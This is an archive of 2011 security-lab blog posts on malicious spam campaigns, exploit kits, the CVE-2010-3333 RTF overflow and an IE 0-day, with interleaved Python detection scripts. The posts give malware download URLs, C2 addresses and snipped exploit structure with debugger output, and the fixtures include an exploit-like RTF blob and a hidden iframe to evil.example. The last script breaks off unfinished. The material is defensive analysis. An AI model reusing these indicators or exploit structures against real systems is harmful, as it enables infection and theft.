Archive for 2011


Want to be friends on Facebook? Don’t click the link!

By Phil Hay  •  August 29th, 2011  •   Malware

Hot on the heels of last week’s malicious attachment spam, we are now observing another large malicious spam campaign – this time without attachments. Like the majority of last week’s campaigns, this spam is being sent out from the Cutwail botnet.

The message arrives as a fake Facebook friend invite notification. It looks convincing: the spammers appear to have copied the real Facebook template and substituted their own links. There are clues it is fake, however. The message contains no profile photos, and the recipient’s email address has been omitted from the fine print at the bottom.

 

By contrast, here is a legitimate Facebook friend request.

 

Clicking the link fetches a web page that offers two ways to infect yourself. First, there is a link posing as an Adobe Flash update, through which you can download and install the malware manually. Second, there is a hidden iframe that loads content from a remote server hosting the Blackhole Exploit Kit, which attempts to automatically exploit vulnerabilities on your system, notably in Java.
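As an added illustration (not code from the original post), the following Python script flags hidden iframes of the kind described above when run over a fetched landing page. The sample HTML and the host names evil.example and ads.example are constructed; the size and offset thresholds that count as "hidden" are assumptions.

```python
"""Flag hidden <iframe> elements in a fetched landing page.

Added example, not code from the original post. The HTML sample below is
constructed for illustration; evil.example and ads.example are made up.
"""
from html.parser import HTMLParser
import re

# Constructed sample page: a visible "Flash update" link plus a 1x1 hidden
# iframe that pulls in an exploit-kit landing page, and one ordinary ad frame.
SAMPLE_PAGE = """
<html><body>
<p>Your Adobe Flash Player is out of date.</p>
<a href="http://evil.example/flash_update.exe">Update now</a>
<iframe src="http://evil.example/in.php" width="1" height="1"
        style="visibility:hidden; position:absolute; left:-9999px"></iframe>
<iframe src="http://ads.example/banner" width="300" height="250"></iframe>
</body></html>
"""

_SIZE_RE = re.compile(r"^\s*(\d+)(px)?\s*$")


def _tiny(value):
    """True if a width/height attribute is 0 or 1 (pixels or unitless)."""
    if value is None:
        return False
    m = _SIZE_RE.match(value)
    return bool(m) and int(m.group(1)) <= 1


def _hidden_style(style):
    """True if inline CSS hides the element or pushes it off-screen."""
    if not style:
        return False
    s = style.replace(" ", "").lower()
    if "display:none" in s or "visibility:hidden" in s:
        return True
    # Assumption: an offset of three or more digits means off-screen.
    return re.search(r"(left|top):-\d{3,}", s) is not None


class HiddenIframeFinder(HTMLParser):
    """Collect the src of iframes hidden by size or by style."""

    def __init__(self):
        super().__init__()
        self.hidden = []
        self.visible = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = dict(attrs)
        src = a.get("src", "")
        if (_tiny(a.get("width")) or _tiny(a.get("height"))
                or _hidden_style(a.get("style"))):
            self.hidden.append(src)
        else:
            self.visible.append(src)


def find_hidden_iframes(html):
    """Return (hidden_srcs, visible_srcs) for one page."""
    p = HiddenIframeFinder()
    p.feed(html)
    p.close()
    return p.hidden, p.visible


if __name__ == "__main__":
    hidden, visible = find_hidden_iframes(SAMPLE_PAGE)
    for src in hidden:
        print("hidden iframe ->", src)
```

A gateway that renders pages would also want to follow the iframe src and inspect what comes back; this script only answers the narrower question of whether a frame is being kept out of the user's sight.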

 

 

The malware that is downloaded appears to be a data-stealing Zbot variant (VirusTotal report here).

Impersonation of the big social networks’ email notifications is an increasingly common tactic of the spammers. Be wary out there, not everything is as it seems.

 


Massive Rise in Malicious Spam

By Rodel Mendrez  •  August 16th, 2011  •   Spam

In April this year, we reported on a spike in malicious spam. That was a significant increase, but not as large as what we have observed this week. Since the beginning of August we have seen a surge of malicious spam that far exceeds anything in the past two years, including the period before the SpamIt takedown last October. The majority of it comes from the Cutwail botnet, although Festi and Asprox are among the other contributors.

 

Last week malicious spam made up at least 13% of the total spam volume we received, which is unusually high. Yesterday that number spiked to 24%.

Spam by category as of last week

Four of the campaigns, which we identified as originating from the Cutwail botnet, are mostly recycled spam themes: Fedex, credit card, changelogs and invoices. The malware is attached inside a ZIP archive and is a Trojan that downloads additional malware, including Fake AV, SpyEye and the Cutwail spambot itself.

Fedex

Fedex Spam Campaign

Credit Card Blocked

Credit Card Blocked spam campaign

Invoice

Invoice spam campaign

Change Log

Change Log spam campaign

 

Meanwhile, Asprox is continuing to send out malicious hotel transaction spam. The attached malware in this spam campaign installs a password stealer and Fake AV.

Sample of malicious spam sent by Asprox

 

The Festi botnet has also joined the fray and is sending a malicious “UPS” campaign that distributes the Chepvil Trojan, a downloader that is also installing Fake AV.

UPS spam campaign sent by Festi

This is an epic amount of malicious spam. After multiple recent botnet takedowns, cyber criminal groups remain resilient, clearly looking to build their botnets and distribute more fake AV in the process. It seems spammers have returned from a holiday break and are enthusiastically back to work.


Malicious hotel transaction spam

By Gavin Neale  •  July 29th, 2011  •   Spam

Over the past couple of days we have been seeing numerous spam emails claiming that a wrong transaction was made on your credit card by a hotel. The subject lines resemble the following two, with the hotel name varying:

Hotel Sutton Place made wrong transaction
Wrong transaction from your credit card in Four Seasons Resort Scottsdale

We have also seen several different message bodies that try to explain, in fairly bad English, that your credit card has been charged by a hotel and that in order to get your money back you will need to fill in an attached form and send it to your bank.

Dear Guest!
Transaction: Visa 86878_j
This letter notifies that on July 26th, 2011 Hotel made wrong writing-down from your credit account. Total sum of decommissioning is $1937
Due to the termination of service contract between Hotel Melia Deviana and Moverick Company this Hotel was divested accreditation in our company.
For the return of funds please contact your bank and fill information in the attached form.
The detailed copy of made writing-down you can find in the attachment.
Company just mediates and bears no responsibility for any money transactions made by Hotel.
Thank you for understanding. We trust you can solve this unpleasant problem.

Alexander Hargrave,
Manager of Reception Desk & Reservation Departament

Dear Client!
Transaction: Visa 4098_6e
On July 26th, 2011 Hotel made wrong transaction decommissioning from your credit card totaling $1037.
This partner hotel was divested accreditation in Moverick Company with reference of noncompliance of the service contract.
Please see the attached form. You need to fill it in and contact your bank for the return of funds.
In the attachment you will find expense sheet with the sum of wrong transaction writing-down.
Company just mediates and bears no responsibility for any money transactions made by Hotel.
Thank you for understanding. We trust you can solve this unpleasant problem.

Caleb Anketil,
Manager of Reception Desk & Reservation Departament

 

Attached is a ZIP file named RefundFormXXX.zip, where XXX is a random three-digit number. Inside is a single executable, Refund-Form.exe, whose icon is likely intended to convince unsuspecting victims that it is some kind of form they can view.

The executable inside the 'RefundForm' Zip file

 

Once executed this malware downloads the file soft.exe from yomwarayom2001[dot]ru (84.247.61.25). This did not run straight away so we ran it on a separate test machine and verified that this is a fake AV product named ‘Security Protection’.

A further HTTP request is sent to 188.72.202.121, shown below, which requests a module called ‘grabbers’ from load.php.

The HTTP request and response for the encrypted password stealer

 

The file that is retrieved, called ‘update.dat’, is in fact an encrypted Windows DLL. Once decrypted, we found it to be a password stealer that targets a huge number of applications, including instant messaging programs, poker clients, FTP clients and web browsers, looking for stored passwords.

Screenshot of the disassembled password stealer showing some of the targeted applications.

 

Almost a day later, with still no visible signs that our test machine was infected, the HTTP request below was sent which downloaded the file 1036.exe.

HTTP download of 1036.exe

 

Within minutes of this download finishing, a fake AV program called ‘Personal Shield pro’ was launched.

Both the attached executable files and those that were downloaded after the initial infection had very low detection rates among anti-virus engines, which highlights the need to be very cautious when opening email attachments and to keep anti-virus software up to date.

 

Thanks to Rodel Mendrez for his investigation into the password stealer component.


Resurrection of CVE-2010-3333 In-The-Wild

By Yaniv Miron  •  July 5th, 2011  •   Cybercrime

During the last few weeks we have seen massive use of the CVE-2010-3333 vulnerability in Microsoft Office. This eight-month-old vulnerability is being used in lure documents such as one that pretends to be “President Obama’s Speech”.

Microsoft Office vulnerabilities have become very popular over the last few years and here are several samples that can be found In-The-Wild that use MS10-087 / CVE-2010-3333.

A brief overview of the vulnerability can be found at MITRE under CVE-2010-3333:

“Stack-based buffer overflow in Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office 2010, Office 2004 and 2008 for Mac, Office for Mac 2011, and Open XML File Format Converter for Mac allows remote attackers to execute arbitrary code via crafted RTF data, aka ‘RTF Stack Buffer Overflow Vulnerability.’”

As we can see there is an exploit that is a part of the Metasploit exploit framework:


Figure 1 – Metasploit main page

The vulnerability is in the RTF parser, but the exploit does not need an .RTF extension: Word decides how to parse a file from its content, so an RTF body saved with a .DOC extension is still parsed as RTF (it is not an actual .DOC file, it merely carries a .DOC extension).

Figure 2 – Part of the exploit from Metasploit

 

CVE-2010-3333 Sample Analysis

File Name: President Obama’s Speech.doc

MD5: 35c33bbd97d7f5629d64153a1b3e71f1

The following analysis was performed via Word 2003.

Here we can see the text view of the file and we can clearly see that they are using CVE-2010-3333:

Figure 3 – Text view of CVE-2010-3333 sample

Let’s examine the hex view of the file:

Figure 4 – Hex view of CVE-2010-3333 sample

 

Now, let’s examine the beginning of the file:

{\rtf1{\shp{\*\shpinst{\sp{\sn pFragments}{\sv 1;1000000…[SNIP]…0;01234567ff000…[SNIP]…

From Microsoft Office Word 2003 Rich Text Format (RTF) Specification:

“Drawing Object Properties

The bulk of a drawing object is defined as a series of properties. The {\shp control word is followed by {\*\shpinst. Following the {\*\shpinst is a list of all the properties of a shape. Each of the properties is in the following format:

{ \sp  { \sn PropertyName } { \sv PropertyValueInformation } }

The control word for the drawing object property is \sp. Each property has a pairing of the name (\sn) and value (\sv) control words placed in the shape property group.”

We see that it is an RTF file containing a shape property whose name control word \sn carries the PropertyName pFragments (fragments are optional, additional parts to the shape; they allow the shape to contain multiple paths and parts, and this property lists the fragments of the shape). After that comes the \sv value: a first value, a semicolon, a second value, another semicolon and a third value. The third value, the fragment data itself, is what triggers the buffer overflow.
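To make the structural check above concrete, here is an added Python scanner (not the post’s or Metasploit’s code) that identifies RTF content regardless of file extension, locates the pFragments property and inspects the third field of its \sv value. The two sample documents are constructed, not the in-the-wild files listed below, and the hex-digit threshold is an assumption.

```python
"""Scan files for the CVE-2010-3333 pFragments pattern regardless of extension.

Added example, not the original post's or Metasploit's code. The threshold
and the two sample documents are assumptions constructed for illustration.
"""
import re

RTF_MAGIC = b"{\\rtf"
# Matches {\sn pFragments}{\sv <value>} with optional whitespace; whether the
# optional {\*\shpinst ...} wrapper seen in the wild is present does not matter.
PFRAG_RE = re.compile(
    rb"\{\\sn\s+pFragments\s*\}\s*\{\\sv\s+([^}]*)\}", re.IGNORECASE)

# Assumption for this example: genuine fragment data is short, so more than
# this many hex digits in the third field is treated as suspicious.
MAX_HEX_DIGITS = 128


def is_rtf(data):
    """Word sniffs content, so an RTF body with a .doc name is still RTF."""
    return data.lstrip().startswith(RTF_MAGIC)


def inspect_pfragments(data):
    """Return one finding dict per pFragments property found in the data."""
    findings = []
    for m in PFRAG_RE.finditer(data):
        fields = m.group(1).split(b";")
        finding = {"offset": m.start(), "fields": len(fields),
                   "hex_digits": 0, "suspicious": False, "reason": ""}
        if len(fields) < 3:
            finding["reason"] = "malformed: fewer than 3 fields"
            finding["suspicious"] = True
        else:
            payload = b"".join(fields[2].split())  # drop RTF line breaks
            finding["hex_digits"] = len(payload)
            if re.fullmatch(rb"[0-9a-fA-F]*", payload) is None:
                finding["reason"] = "third field is not hex"
                finding["suspicious"] = True
            elif len(payload) > MAX_HEX_DIGITS:
                finding["reason"] = "oversized fragment data"
                finding["suspicious"] = True
        findings.append(finding)
    return findings


def classify(name, data):
    """Verdict for one file: 'clean', 'rtf-disguised' or 'cve-2010-3333?'."""
    if not is_rtf(data):
        return "clean"
    if any(f["suspicious"] for f in inspect_pfragments(data)):
        return "cve-2010-3333?"
    if not name.lower().endswith(".rtf"):
        return "rtf-disguised"   # RTF content hiding behind another extension
    return "clean"


# Constructed samples (not the real in-the-wild documents listed in the post).
EXPLOIT_LIKE = (b"{\\rtf1{\\shp{\\*\\shpinst{\\sp{\\sn pFragments}{\\sv 1;1000000;"
                + b"01234567ff" * 100 + b"}}}}}")
BENIGN_RTF = b"{\\rtf1\\ansi{\\shp{\\sp{\\sn pFragments}{\\sv 1;4;00010002}}}}"

if __name__ == "__main__":
    print(classify("President Obama's Speech.doc", EXPLOIT_LIKE))
    print(classify("notes.rtf", BENIGN_RTF))
```

Because the check keys on the property name and the size of the third field rather than on any particular shellcode, it covers the three samples listed below equally, which the post notes carry different shellcodes; it would not catch an attacker who splits the hex payload with RTF control words the scanner does not strip.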

Now that we’ve seen that hackers use the vulnerability In-The-Wild, let’s try and get a better understanding of the vulnerability by using the Metasploit sample:

{\rtf1{\shp{\sp{\sn pFragments}{\sv 5;6;11111111acc8111…[SNIP]…

 

ASM info:

30e9eb72 81e1ffff0000    and     ecx,0FFFFh
30e9eb78 56              push    esi
30e9eb79 8bf1            mov     esi,ecx
30e9eb7b 0faf742414      imul    esi,dword ptr [esp+14h]
30e9eb80 037010          add     esi,dword ptr [eax+10h]
30e9eb83 8bc1            mov     eax,ecx
30e9eb85 c1e902          shr     ecx,2
30e9eb88 f3a5            rep movs dword ptr es:[edi],dword ptr [esi] ; Overflow!
30e9eb8a 8bc8            mov     ecx,eax
30e9eb8c 83e103          and     ecx,3
30e9eb8f f3a4            rep movs byte ptr es:[edi],byte ptr [esi]
30e9eb91 5e              pop     esi
30e9eb92 5f              pop     edi
30e9eb93 c20c00          ret     0Ch

 

Debugger info:

(100.3f8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0000c8ac ebx=05000000 ecx=00000023 edx=00000000 esi=025dc82c edi=00130000
eip=30e9eb88 esp=001237b8 ebp=001237f0 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
…[SNIP]…
mso!Ordinal6426+0x64d:
30e9eb88 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]

Note the register state at the fault. The copy length was masked to 16 bits at 30e9eb72 and saved in eax before ecx was shifted right by two for the dword copy, so eax still holds it: 0xc8ac, which is the acc8 in the Metasploit sample above read as a little-endian word. That length is taken from the fragment data, not from the size of the destination, so rep movs keeps copying into the stack buffer just above esp until edi reaches 0x00130000, past the end of the stack region, where the access violation fires.

 

In-The-Wild Samples

Here are few of the samples that we’ve found:

File Name: 2011 Insider’s Guide to Military Benefits .doc

MD5: f520c8671ddb9965bbf541f20635ef30

File Name: President Obama’s Speech.doc

MD5: 35c33bbd97d7f5629d64153a1b3e71f1

File Name: Q and A.doc

MD5: 46863c6078905dab6fd9c2a480e30ad0

The samples use different shellcodes, but as we can see, the exploit is In-The-Wild and is being used by malicious hackers.

These types of attacks are blocked by M86 Security’s Secure Web Gateway solution.


Malicious spam campaign: Credit Card Overdue

By Rodel Mendrez  •  June 30th, 2011  •   Spam

We are currently seeing a large scale malicious spam campaign that claims to be a “Credit Card Overdue” notice. The campaign is originating from one of the Cutwail spambot variants. The theme has no specific credit card brand, possibly because the spammer thought a generic template may entice more victims. The spam message claims the credit card holder has an overdue credit card that needs to be settled in 2 days or else a $25 late fee and finance charge will be imposed.

The malicious application is attached in a ZIP file disguised as a credit card statement. Extracting the ZIP reveals a Trojan downloader executable that uses an Adobe PDF icon. When the executable is run it downloads a fake anti-virus executable from the following URL:

http://mysteryforyou1[dot]ru/pusk.exe
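The hotel refund and credit card overdue campaigns above share one delivery mechanism: a lure subject and a ZIP attachment whose only member is an executable wearing a misleading icon. The following Python triage routine is an added example rather than code from either post. It builds a constructed message of that shape and checks it: the subject patterns are derived from the two subject lines quoted in the hotel post, each ZIP member is inspected by its MZ magic rather than by name, and the message, the ZIP and the fake Refund-Form.exe stub are all constructed here.

```python
"""Triage an inbound message: lure subject plus a ZIP hiding an executable.

Added example, not the original posts' code. The message, the ZIP and the
fake 'Refund-Form.exe' are constructed here; the hotel subject patterns are
derived from the two subject lines quoted in the post.
"""
import io
import re
import zipfile
from email import message_from_bytes, policy
from email.message import EmailMessage

# Subject templates seen in the campaigns (hotel name varies).
LURE_SUBJECTS = [
    re.compile(r"^hotel .+ made wrong transaction$", re.I),
    re.compile(r"^wrong transaction from your credit card in .+$", re.I),
    re.compile(r"credit card overdue", re.I),
]
EXEC_EXT = (".exe", ".scr", ".com", ".pif", ".bat", ".cmd")


def subject_is_lure(subject):
    return any(p.search(subject or "") for p in LURE_SUBJECTS)


def executables_in_zip(blob):
    """Names of ZIP members that are PE files or carry an executable extension.

    The MZ magic is checked, not just the name, so a member renamed to
    'Refund-Form.pdf' but built from a PE would still be caught.
    """
    found = []
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            with zf.open(info) as fh:
                head = fh.read(2)
            if head == b"MZ" or info.filename.lower().endswith(EXEC_EXT):
                found.append(info.filename)
    return found


def triage(raw):
    """Return a verdict dict for one raw RFC 822 message."""
    msg = message_from_bytes(raw, policy=policy.default)
    result = {"subject_lure": subject_is_lure(msg["subject"]),
              "executables": []}
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        payload = part.get_payload(decode=True) or b""
        if name.lower().endswith(".zip") and payload.startswith(b"PK"):
            try:
                result["executables"] += executables_in_zip(payload)
            except zipfile.BadZipFile:
                result["executables"].append(name + " (corrupt zip)")
    if result["executables"]:
        result["verdict"] = "block"        # executable inside an attachment
    elif result["subject_lure"]:
        result["verdict"] = "suspicious"   # lure theme, no payload found
    else:
        result["verdict"] = "allow"
    return result


def build_sample():
    """Constructed lure: hotel subject + RefundForm123.zip with a fake PE."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Refund-Form.exe", b"MZ" + b"\x00" * 62)  # fake PE stub
    msg = EmailMessage()
    msg["Subject"] = "Hotel Sutton Place made wrong transaction"
    msg["From"] = "reservations@hotel.example"
    msg["To"] = "guest@victim.example"
    msg.set_content("Please fill in the attached refund form.")
    msg.add_attachment(buf.getvalue(), maintype="application",
                       subtype="zip", filename="RefundForm123.zip")
    return msg.as_bytes()


if __name__ == "__main__":
    print(triage(build_sample()))
```

The executable check alone is enough to block both campaigns; the subject patterns are there so that a message whose ZIP is password-protected or otherwise unreadable still gets quarantined for a look rather than delivered.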


The fake AV pops up a fake warning.

Fake AV system utility

Spammers are constantly inventing new social engineering themes in an effort to distribute their malware. Targeting credit card holders, especially in this tough economy, is just another theme in their portfolio. The spammers can change their themes over time, and often just recycle old ones. There is enough in this message to cause most people to be suspicious, especially the fact that your credit card company is unlikely to be emailing you in the first place.  So, as usual, be wary.


0-day exploit used in a targeted attack – CVE-2011-1255

By Avri Schneider  •  June 26th, 2011  •   Cybercrime Malware Vulnerabilities

Time Element Memory Corruption, a remote code execution vulnerability in Internet Explorer recently patched by Microsoft as part of MS11-050 and assigned the Common Vulnerabilities and Exposures (CVE) number CVE-2011-1255, is being actively exploited in the wild.

The M86 Security Labs team was contacted and asked to inspect the URL of a legitimate website belonging to a large private company, which had been blocked by one of the proactive detection rules in our Secure Web Gateway product.

We were asked to investigate whether it was indeed a malicious page or a case of over-blocking.

The page looked benign, but on inspecting each included JavaScript file we saw that one of them was injecting an iframe pointing to a malicious page, one that was very easily classified as malicious because shellcode patterns formed part of the page’s DOM.

So, just another infected site – big deal right? But, after further inspection, we saw that it exploited an un-published security vulnerability in Internet Explorer. To verify this, we viewed the malicious page on the latest fully patched version of IE and saw a crash followed by execution of malicious code.

You can imagine the excitement on the team – finding a 0-day in the wild!

The excitement of finding a 0-day in the wild didn’t last that long, since soon after, Microsoft released details about this particular vulnerability.

Based on data we have reviewed from various sources, we can say with a high level of certainty that the anonymous researcher who, according to Microsoft’s security advisory, reported the vulnerability details to VeriSign iDefense, or at least one of his acquaintances, used those details for malicious purposes as part of targeted attacks.

We decided that we should inspect the shellcode to see what the attacker was after. It used various anti-debugging tricks, but after decoding, it revealed a clear-text URL pointing to a malicious server already listed in our repository.

The attack sample stored in our repository was an attack for the well-known iepeers.dll vulnerability exploiting CVE-2010-0806.

It is interesting to note that the first saved sample of the attack was dated 21.3.10, while details of the vulnerability were reported and patched by Microsoft’s MS10-018 security patch for Internet Explorer on 30.3.10.

Two 0-day exploits served from the same server – impressive!

We wanted to find out where else he is serving his malicious code.

Remember the code snippet shown above, showing how the attacker hid the shellcode as part of the DOM?

Hiding data in the DOM of the page is an effective obfuscation technique: it bypasses security software that does not behave as an actual browser and whose script engine therefore has no access to the real DOM.

It turns out that one of the side effects of hiding data inside DIV elements is that it makes the data indexable by search engines.
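To show what a scanner that does read the DOM can do with this, here is an added Python example (not the post’s code) that walks a page with html.parser, accumulates the text of each DIV and flags blobs that look like parked shellcode: long, free of whitespace and digit-heavy. The page and the TTu…UU blob are constructed to mimic the shape of what the post describes, not the real payload, and the thresholds are assumptions. The hunt token it emits is the kind of stable substring you would feed to a search engine, as the post did.

```python
"""Find shellcode-like text blobs parked inside DIV elements.

Added example, not the original post's code. The page below is constructed;
the 'TTu...UU' blob only mimics the shape of what the post describes and is
not the real payload. Length and digit-ratio thresholds are assumptions.
"""
from html.parser import HTMLParser
import re

# Constructed blob and page: a normal paragraph, a hidden div carrying a long
# run of encoded bytes, and a script that reads the div instead of embedding
# the data itself (so a scanner that only sees the script finds nothing).
BLOB = "TTu0d0f" + "d0dud0d0f" * 8 + "d0dLL1043416UU"
SAMPLE_PAGE = (
    "<html><body>\n"
    "<p>Welcome to our company site. Latest news below.</p>\n"
    f'<div id="d1" style="display:none">{BLOB}</div>\n'
    '<div id="d2">Contact us</div>\n'
    "<script>var s = document.getElementById('d1').innerHTML;</script>\n"
    "</body></html>\n"
)

MIN_BLOB_LEN = 40       # assumption: real shellcode is far longer than this
MIN_DIGIT_RATIO = 0.3   # assumption: encoded bytes are digit-heavy
_BLOB_RE = re.compile(r"^[A-Za-z0-9%\\]+$")   # no spaces, no punctuation


class DivBlobFinder(HTMLParser):
    """Accumulate the text of every element; evaluate DIVs on close."""

    def __init__(self):
        super().__init__()
        self.stack = []       # entries: (tag, attrs, text chunks)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        self.stack.append((tag, dict(attrs), []))

    def handle_data(self, data):
        if self.stack:
            self.stack[-1][2].append(data)

    def handle_endtag(self, tag):
        # Pop until the matching open tag; tolerates unclosed inner tags.
        while self.stack:
            t, attrs, chunks = self.stack.pop()
            if t == tag:
                if t == "div":
                    self._check(attrs, "".join(chunks).strip())
                break

    def _check(self, attrs, text):
        if len(text) < MIN_BLOB_LEN or not _BLOB_RE.match(text):
            return
        digits = sum(ch.isdigit() for ch in text) / len(text)
        if digits < MIN_DIGIT_RATIO:
            return
        style = (attrs.get("style") or "").replace(" ", "").lower()
        self.findings.append({
            "id": attrs.get("id"),
            "hidden": "display:none" in style or "visibility:hidden" in style,
            "length": len(text),
            "digit_ratio": round(digits, 2),
            # Stable substring to hunt for in other pages or a search engine.
            "hunt_token": text[:12] + "..." + text[-12:],
        })


def find_div_blobs(html):
    """Return the list of suspicious DIV blobs found in the page."""
    p = DivBlobFinder()
    p.feed(html)
    p.close()
    return p.findings


if __name__ == "__main__":
    for f in find_div_blobs(SAMPLE_PAGE):
        print(f)
```

The heuristic is deliberately content-agnostic: it does not try to decode the blob, only to notice that a DIV is holding something that is not prose, which is exactly the property that made the real payload searchable.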

Google searching the pattern “TTu0d0f[...snip...]d0dLL1043416UU” revealed about 16 results and as of this writing, only a few were still alive.

Here is the list of the infected sites according to Google’s search result:

Not to mention the service of caching samples for us, it’s ironic that an attacker’s obfuscation technique can be used against him to find his infection servers using a simple Google search. :)


Phoenix Exploit Kit (2.7) continues to be updated

By Daniel Chechik  •  June 4th, 2011  •   Cybercrime

A few weeks ago, the Phoenix Exploit Kit 2.5 source code was leaked. At the time it was not really usable, as it required activation by the author of the exploit kit: it contains an activation page that is used to load all the exploits onto the server for each specific customer. As expected, the author has since released a new version of the tool, version 2.7.

Phoenix Exploit’s Kit 2.7 logo


The changes between the two versions are minor, but still very important as most exploits become inefficient in the very short term, especially with the latest IE vulnerabilities.


Malicious LinkedIn Campaign

By Phil Hay  •  June 3rd, 2011  •   Malware

We are currently seeing a malicious spam campaign purporting to be a notification from LinkedIn.  The messages look realistic, but the giveaway is the bogus link exposed when you hover over the confirm button.

The bogus link salesforceappi[dot]com leads off to a server hosting an exploit kit, which automatically attempts to load malware onto the victim’s computer by using one of a number of ‘canned’ exploits targeting known vulnerabilities.

The campaign is very similar to one we saw last September, also using LinkedIn and also leading to an Exploit Kit.  Real notifications from these sorts of social networking sites are commonplace and the bad guys are preying on this. Remember, just because it looks legit, doesn’t mean it is.
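The hover check above can be automated. The following Python script, an added example that is not from the original post, collects every anchor in a notification e-mail and reports those whose host falls outside the domains the claimed brand legitimately uses. The sample HTML is constructed; salesforceappi.example stands in for the salesforceappi[dot]com domain named above; the brand-to-domain table and the two-label “registrable domain” shortcut are assumptions.

```python
"""Check whether the links in a notification e-mail point where they claim.

Added example, not the original post's code. The HTML below is a constructed
stand-in for a LinkedIn-style notification; 'salesforceappi.example' stands
for the salesforceappi[dot]com domain named in the post. The brand table and
the two-label registrable-domain shortcut are assumptions.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Brands a notification may claim to come from and the domains they
# legitimately link to (assumption: extend for your own environment).
BRAND_DOMAINS = {
    "linkedin": {"linkedin.com"},
    "facebook": {"facebook.com", "facebookmail.com"},
}

# Constructed notification: real-looking footer link, bogus confirm button.
SAMPLE_EMAIL = """
<html><body>
<p>Joe Bloggs wants to connect with you on LinkedIn.</p>
<a href="http://salesforceappi.example/confirm?id=1234">Confirm that you know Joe</a>
<p>You are receiving Invitation emails.
<a href="http://www.linkedin.com/unsubscribe">Unsubscribe</a></p>
<p>&copy; 2011, LinkedIn Corporation</p>
</body></html>
"""


def registrable(host):
    """Crude eTLD+1: last two labels (assumption; use a PSL in production)."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


class LinkCollector(HTMLParser):
    """Gather (href, visible text) for every anchor in the message."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href", "")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, " ".join(self._text).strip()))
            self._href = None


def claimed_brand(html):
    """First brand name mentioned in the body, or None."""
    low = html.lower()
    for brand in BRAND_DOMAINS:
        if brand in low:
            return brand
    return None


def link_mismatches(html):
    """Links whose host is outside the claimed brand's legitimate domains."""
    brand = claimed_brand(html)
    if brand is None:
        return []
    allowed = BRAND_DOMAINS[brand]
    p = LinkCollector()
    p.feed(html)
    p.close()
    bad = []
    for href, text in p.links:
        host = urlparse(href).hostname or ""   # mailto:/relative links skipped
        if host and registrable(host) not in allowed:
            bad.append({"text": text, "host": host})
    return bad


if __name__ == "__main__":
    for m in link_mismatches(SAMPLE_EMAIL):
        print(f"'{m['text']}' points at {m['host']}")
```

A single off-brand link is not proof of malice (tracking redirectors are common), but a button labelled as the primary action pointing somewhere the brand does not own is exactly the tell described above, and it is the link to feed into a sandbox rather than a browser.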

Update: 7 June

After some investigation, we identified the exploit kit as the Blackhole kit, and managed to gain access to its control panel.  Below is an interesting statistics page that shows:

  • Successful malware ‘loads’ at 17.55%
  • Successful loads against most browsers, with Internet Explorer at the top with 28.25% of loads
  • Successful loads on a range of operating systems
  • Java exploits account for 80% of successful loads, and PDF exploits account for a further 12%.

The moral of the story is to keep your software updated, impeccably, at all times.  Particularly Java and PDF readers.

 

Thanks to Daniel Chechik who assisted with details on the Blackhole Exploit kit.


New Bots, Old Bots II: Donbot

By Phil Hay  •  June 2nd, 2011  •   Spam

Last week we blogged about the rise of two botnets in our spam statistics and provided details of Xarvester. Today, we take a closer look at the other botnet in question: Donbot.

Donbot has been around for about three years but lately has surged to the top of our spam statistics chart with masses of dating and gambling spam. We recently found a suitable sample (VirusTotal report) and took a look.

When executed, the malware immediately contacted its control server at 91.212.135.158 on port 80 and issued the following POST request:

POST /gateway/index HTTP/1.0

The server replied NO_TASK_WAIT.  And wait we did – for a long time with the bot checking in like this roughly every 20 minutes.  Then after two days the server suddenly sprang into life and responded with a download file svchosta.exe (VirusTotal report):

 

This led to the installation of the Donbot spamming component, where four similar processes were spawned on the infected host.  These executables were all dropped in the c:\documents and settings\administrator\application data folder on our Windows XP host:

The four processes were all spamming simultaneously.  When we killed some of the processes, the bot simply spawned more copies to replace them.  The combined spam output rate was quite impressive, we measured 1800 messages per minute (108,000 messages per hour) in our lab. Before anyone thinks we’re spamming, rest assured that these messages were all captured by our spam sinkhole servers.  This kind of spamming rate quickly leads to big numbers.  For example, take a botnet of just 1000 bots, multiply that by 108,000 messages per hour and assume each host is spamming for 8 hours per day, and you get a spamming machine capable of over 800 million spam messages per day.
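The check-in behaviour described above (a POST to /gateway/index roughly every 20 minutes, answered with NO_TASK_WAIT until a task arrives) is the kind of regularity a proxy log exposes. Here is an added Python example, not code from the post, that groups POSTs by client, host and path and reports series whose intervals are nearly constant. The log lines and their format are constructed; the 20-minute period comes from the post, while the minimum hit count and jitter tolerance are assumptions.

```python
"""Spot Donbot-style check-ins in proxy logs: regular POSTs to one path.

Added example, not the original post's code. Log lines are constructed in a
made-up 'timestamp client method url' format; the 20-minute period comes
from the post, the jitter tolerance and minimum count are assumptions.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev
from urllib.parse import urlparse

# Constructed log: one host beaconing every ~20 minutes, one normal host.
SAMPLE_LOG = """\
2011-05-30T10:00:00 10.0.0.5 POST http://91.212.135.158/gateway/index
2011-05-30T10:03:11 10.0.0.5 GET http://www.example.com/index.html
2011-05-30T10:20:04 10.0.0.5 POST http://91.212.135.158/gateway/index
2011-05-30T10:39:58 10.0.0.5 POST http://91.212.135.158/gateway/index
2011-05-30T10:41:00 10.0.0.9 POST http://mail.example.com/owa/
2011-05-30T11:00:01 10.0.0.5 POST http://91.212.135.158/gateway/index
2011-05-30T11:19:55 10.0.0.5 POST http://91.212.135.158/gateway/index
2011-05-30T11:30:00 10.0.0.9 POST http://mail.example.com/owa/
2011-05-30T12:15:00 10.0.0.9 POST http://mail.example.com/owa/
"""

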